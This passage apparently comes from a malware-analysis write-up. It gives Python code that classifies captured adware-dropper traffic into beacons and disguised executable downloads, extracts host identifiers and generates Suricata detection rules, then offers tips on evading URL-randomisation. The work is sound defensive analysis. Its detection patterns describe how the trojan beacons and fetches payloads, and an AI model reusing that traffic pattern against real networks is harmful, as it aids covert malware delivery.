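    (osprod=Microsoft Windows XP), which a whitespace-delimited regex rejects."""
    method, rest = line.split(" ", 1)
    target, version = rest.rsplit(" ", 1)
    if not version.startswith("HTTP/1."):
        raise ValueError(f"not an HTTP/1.x request line: {line!r}")
    path, _, query = target.partition("?")
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"method": method, "host": host, "path": path, "params": params}


def classify(req, content_type, content_length):
    """Label one request/response pair.

    telemetry-beacon: GET for a .gif carrying an event (action= or report=)
    answered with a tiny image; the pixel is the reporting channel and only
    the query string matters.
    payload-download: an executable-looking path answered with a large body
    declared as text/* or image/*, i.e. a mislabelled binary."""
    labels = []
    p = req["params"]
    if (req["path"].endswith(".gif") and ("action" in p or "report" in p)
            and content_length < 100):
        labels.append("telemetry-beacon")
    if (".exe" in req["path"] and content_length > 100_000
            and content_type.startswith(("text/", "image/"))):
        labels.append("payload-download")
    return labels


def shared_identifiers(reqs):
    """Identity parameters whose value is identical in every beacon that
    carries them: candidates for host-specific indicators (upi, bic, ...)."""
    seen = {}
    for r in reqs:
        for k in IDENTITY_KEYS:
            if k in r["params"]:
                seen.setdefault(k, set()).add(r["params"][k])
    return {k: next(iter(v)) for k, v in seen.items() if len(v) == 1}


def suricata_rule(req, sid):
    """Suricata 5+ HTTP rule for an exact host and path (sid is arbitrary).
    Matching host and path only avoids the per-request rnd= value in the query."""
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any ('
            f'msg:"Adware dropper payload fetch {req["host"]}{req["path"]}"; '
            'flow:established,to_server; '
            f'http.host; content:"{req["host"]}"; '
            f'http.uri; content:"{req["path"]}"; startswith; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


def analyse(capture=CAPTURE):
    reqs = [parse_request(line, host) for line, host, _, _ in capture]
    labelled = [(r, classify(r, ct, cl)) for r, (_, _, ct, cl) in zip(reqs, capture)]
    beacons = [r for r, l in labelled if "telemetry-beacon" in l]
    downloads = [r for r, l in labelled if "payload-download" in l]
    return {
        "hosts": sorted({r["host"] for r in reqs}),
        "beacons": len(beacons),
        "identifiers": shared_identifiers(beacons),
        "rules": [suricata_rule(r, 9000001 + i) for i, r in enumerate(downloads)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(), indent=2))
```

Two points to carry over when turning this into detection: rnd= changes on every beacon, so URL-based matching has to drop it (the rule above matches host and path only), and the payload host answers with text/plain, so a proxy rule that inspects downloads by declared Content-Type will not see this as an executable; match on the path or on the body's magic bytes instead.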
Map
The Trojan connects to the servers at the following location(s):